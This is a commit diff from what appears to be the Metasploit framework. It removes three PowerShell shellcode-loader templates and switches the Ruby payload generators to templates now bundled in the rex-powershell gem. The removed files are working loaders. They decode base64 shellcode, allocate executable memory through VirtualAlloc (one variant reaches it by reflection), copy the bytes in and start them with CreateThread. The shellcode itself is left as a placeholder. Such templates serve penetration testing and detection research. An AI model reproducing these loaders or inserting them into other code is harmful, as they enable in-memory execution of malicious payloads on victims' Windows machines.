use templates from the gem for psh
use the templates now contained within the magical gem of rex-powershell 7309 MS-2106bug/bundler_fix
parent
63ed5624ff
commit
af4f3e7a0d
|
@ -1,30 +0,0 @@
|
||||||
Set-StrictMode -Version 2
|
|
||||||
$%{var_syscode} = @"
|
|
||||||
using System;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
namespace %{var_kernel32} {
|
|
||||||
public class func {
|
|
||||||
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
|
||||||
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
|
|
||||||
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
|
||||||
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
|
||||||
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
|
||||||
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
"@
|
|
||||||
|
|
||||||
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
|
|
||||||
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
|
|
||||||
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
|
|
||||||
$%{var_compileParams}.GenerateInMemory = $True
|
|
||||||
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
|
||||||
|
|
||||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
|
||||||
|
|
||||||
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
|
||||||
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
|
||||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
|
||||||
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
|
||||||
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
|
||||||
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
|
|
|
@ -1,20 +0,0 @@
|
||||||
$%{var_syscode} = @"
|
|
||||||
[DllImport("kernel32.dll")]
|
|
||||||
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
|
||||||
[DllImport("kernel32.dll")]
|
|
||||||
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
|
||||||
[DllImport("msvcrt.dll")]
|
|
||||||
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
|
||||||
"@
|
|
||||||
|
|
||||||
$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
|
|
||||||
|
|
||||||
%{shellcode}
|
|
||||||
|
|
||||||
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
|
|
||||||
|
|
||||||
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
|
|
||||||
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
|
||||||
}
|
|
||||||
|
|
||||||
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
|
|
|
@ -1,27 +0,0 @@
|
||||||
function %{func_get_proc_address} {
|
|
||||||
Param ($%{var_module}, $%{var_procedure})
|
|
||||||
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
|
|
||||||
|
|
||||||
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
|
|
||||||
}
|
|
||||||
|
|
||||||
function %{func_get_delegate_type} {
|
|
||||||
Param (
|
|
||||||
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
|
|
||||||
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
|
|
||||||
)
|
|
||||||
|
|
||||||
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
|
|
||||||
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
|
||||||
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
|
||||||
|
|
||||||
return $%{var_type_builder}.CreateType()
|
|
||||||
}
|
|
||||||
|
|
||||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
|
||||||
|
|
||||||
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
|
||||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
|
||||||
|
|
||||||
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
|
||||||
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
|
|
@ -194,9 +194,7 @@ module Exploit::Powershell
|
||||||
unless opts.key? :shorten
|
unless opts.key? :shorten
|
||||||
opts[:shorten] = (datastore['Powershell::method'] != 'old')
|
opts[:shorten] = (datastore['Powershell::method'] != 'old')
|
||||||
end
|
end
|
||||||
template_path = File.join(Msf::Config.data_directory,
|
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||||
"templates",
|
|
||||||
"scripts")
|
|
||||||
|
|
||||||
command = Rex::Powershell::Command.cmd_psh_payload(pay,
|
command = Rex::Powershell::Command.cmd_psh_payload(pay,
|
||||||
payload_arch,
|
payload_arch,
|
||||||
|
|
|
@ -1227,9 +1227,7 @@ require 'msf/core/exe/segment_appender'
|
||||||
# @param code [String]
|
# @param code [String]
|
||||||
#
|
#
|
||||||
def self.to_powershell_vba(framework, arch, code)
|
def self.to_powershell_vba(framework, arch, code)
|
||||||
template_path = File.join(Msf::Config.data_directory,
|
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||||
"templates",
|
|
||||||
"scripts")
|
|
||||||
|
|
||||||
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
|
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
|
||||||
arch,
|
arch,
|
||||||
|
@ -1374,9 +1372,7 @@ require 'msf/core/exe/segment_appender'
|
||||||
end
|
end
|
||||||
|
|
||||||
def self.to_powershell_command(framework, arch, code)
|
def self.to_powershell_command(framework, arch, code)
|
||||||
template_path = File.join(Msf::Config.data_directory,
|
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||||
"templates",
|
|
||||||
"scripts")
|
|
||||||
Rex::Powershell::Command.cmd_psh_payload(code,
|
Rex::Powershell::Command.cmd_psh_payload(code,
|
||||||
arch,
|
arch,
|
||||||
template_path,
|
template_path,
|
||||||
|
@ -1385,9 +1381,7 @@ require 'msf/core/exe/segment_appender'
|
||||||
end
|
end
|
||||||
|
|
||||||
def self.to_powershell_hta(framework, arch, code)
|
def self.to_powershell_hta(framework, arch, code)
|
||||||
template_path = File.join(Msf::Config.data_directory,
|
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||||
"templates",
|
|
||||||
"scripts")
|
|
||||||
|
|
||||||
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
|
powershell = Rex::Powershell::Command.cmd_psh_payload(code,
|
||||||
arch,
|
arch,
|
||||||
|
|
Loading…
Reference in New Issue